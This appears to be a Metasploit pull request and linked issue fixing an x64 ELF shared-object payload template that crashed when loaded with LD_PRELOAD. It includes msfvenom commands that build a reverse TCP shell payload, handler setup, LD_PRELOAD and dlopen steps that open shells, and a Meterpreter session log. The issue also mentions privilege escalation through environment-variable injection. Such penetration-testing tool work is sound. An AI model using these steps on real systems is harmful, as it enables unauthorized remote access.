### PR TITLE
Fix #7397, linux x64 elf-so template crashes under LD_PRELOAD

### LINKED ISSUE #7397: elf-so payload crashes when used with LD_PRELOAD
Trying to use the `elf-so` payload with `LD_PRELOAD` causes a segfault. This would be very useful e.g. in the presence of environment variable injection for privilege escalation.

## Steps to reproduce

How'd you do it?

1.

        $ ./msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf-so > /tmp/elf.so

2.

        $ LD_PRELOAD=/tmp/elf.so /bin/true
        Segmentation fault

Running the program with `LD_DEBUG=all` gives the following helpful line of output:

    4238:     symbol=_res;  lookup in file=/tmp/elf.so [0]
    Segmentation fault

So the `.so` loads correctly, but when the `_res` symbol is looked up in the `.so`, the program crashes. A missing executable section or segment relating to relocations comes to mind. One strange thing is if the payload is loaded with `dlopen()`, no segfault occurs and you get a shell.

### PR DESCRIPTION
**Pull request by mach-0**
After spending a couple terrible hours flipping bits in ELF exes, it looks like the problem was a `DT_HASH` hash table entry pointing to the address `0`. This confused `ld` quite a bit. This entry is unnecessary so I just removed it. This has the nice side effect of shaving 16 bytes off the resulting `.so`, not that it matters much.

Fixes #7397.
### Verification steps
1. Generate a linux x64 `elf-so` payload to test:
   
   ```
   ./msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf-so > /tmp/elf-so
   ```
2. Run a handler with `ExitOnSession false`:
   
   ```
   ./msfconsole -nq
   msf> use exploit/multi/handler
   msf> set payload linux/x64/shell_reverse_tcp
   msf> set LHOST 0.0.0.0
   msf> set LPORT 4444
   msf> set ExitOnSession false
   msf> run -j
   ```
3. Get a shell with `LD_PRELOAD`:
   
   ```
   $ LD_PRELOAD=/tmp/elf.so /bin/true
   [*] Command shell session 13 opened (....)
   ```
4. Get a shell with `dlopen`: 
   
   ```
   $ python -c 'import ctypes; ctypes.cdll.LoadLibrary("/tmp/elf.so")'
   [*] Command shell session 14 opened (....)
   ```

### CODE REVIEW

File: data/templates/src/elf/dll/elf_dll_x64_template.s [hunk 1]
```diff
@@ -50,7 +50,7 @@ shdr:
   dd    0                          ; sh_link
   dd    0                          ; sh_info
   dq    8                          ; sh_addralign
-  dq    dynsz                      ; sh_entsize
+  dq    7                          ; sh_entsize
```
Comment (mach-0) [inline data/templates/src/elf/dll/elf_dll_x64_template.s]: This was changed to a 7 as `sh_entsize` is the number of entries in a table, not the actual memory size in bytes.

File: data/templates/src/elf/dll/elf_dll_x64_template.s [hunk 2]
```diff
@@ -77,7 +74,7 @@ dynsection:
   dq    strtab
 ; DT_STRSZ
   dq    0x0a
-  dq    strtabsz
```
Comment (mach-0) [inline data/templates/src/elf/dll/elf_dll_x64_template.s]: The string/symbol table is technically empty and should have a size of 0. The two null bytes in the table should only be used by the `sh_name` references. This causes no problems but was technically incorrect.

File: data/templates/src/elf/dll/elf_dll_x64_template.s (hunk 1 above)
Comment (mach-0) [inline data/templates/src/elf/dll/elf_dll_x64_template.s]: (This causes no problems but was technically incorrect.)

**Comment by bcook-r7** [comment]
Nice, thanks!

**Comment by busterb** [comment]
Works for me:
```
./msfconsole -qx 'use exploit/multi/handler; set payload linux/x64/mettle/reverse_tcp; set lhost 192.168.56.1; run'
payload => linux/x64/mettle/reverse_tcp
lhost => 192.168.56.1
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (2412016 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:51525) at 2016-10-04 09:59:02 -0500

meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 14.04 (Linux 3.13.0-93-generic)
Architecture : x86_64
Meterpreter  : x64/linux
meterpreter > quit
[*] Shutting down Meterpreter...
```

```
LD_PRELOAD=./mettle.so /bin/true
```

**Comment by wvu-r7** [comment]
Great work here, @mach-0.

**Comment by tdoan-r7** [comment]
# Release Notes

This fix resolves an issue that causes a segfault when trying to use the elf-so payload with LD_PRELOAD.

**Pull request merged**